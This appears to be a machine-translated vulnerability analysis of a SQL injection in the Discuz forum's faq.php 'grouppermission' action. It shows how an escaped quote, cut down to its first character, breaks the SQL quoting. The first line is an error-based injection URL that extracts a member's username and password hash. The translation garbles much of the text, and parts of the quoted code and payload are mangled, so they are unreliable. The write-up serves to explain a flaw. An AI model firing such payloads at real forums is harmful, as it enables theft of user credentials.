Inject code instance:
Copy CodeThe code is as follows:
http://www.php.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select Count (*), Concat ((Select (select Concat (Username,0x20,password) from cdb_members limit 0,1) from ' Information_ Schema '. Tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)%23
Vulnerability Analysis: by Phithon
Copy the Code code as follows:
($action = = ' Grouppermission ') {
...
Ksort ($gids);
$groupids = Array ();
foreach ($gids as $row) {
$groupids [] = $row [0];
}
$query = $db->query ("select * FROM {$tablepre}usergroups U-left JOIN {$tablepre}admingroups a on U.groupid=a.admingid W Here U.groupid in (". Implodeids ($groupids).");
...
}
function Implodeids ($array) {
if (!empty ($array)) {
Return "'". Implode ("', '", Is_array ($array)? $array: Array ($array)). "'";
} else {
Return ';
}
}
First define an array groupids, and then Traverse $gids (which is also the array, that is, $_get[gids]), and the first bit of all the values in the arrays are taken out and placed in the groupids.
Why is this operation causing an injection?
Discuz The Get array is addslashes escaped in the global way, that is, it will ' escape to ', so if our arguments are: gids[1]= ' then it will be escaped to $gids[1]=\ ', and this assignment statement $groupids[] = $ Row[0] is equivalent to taking the first character of the string, that is, the escape symbol is taken out.
Looking back, he used implodeids to handle the data before putting it in the SQL statement. We see the Implodeids function
A very simple function is to use the $groupids array just as ', ' to split up, to make a string similar to ' 1 ', ' 2 ', ' 3 ', ' 4 ' returned.
But our array has just taken out an escape character that will escape a normal one here, such as this:
' 1 ', ' \ ', ' 3 ', ' 4 '
Did you see a bit different, the 4th single quote was escaped, which means that the 5th single quotation mark and the 3rd single quotation mark are closed.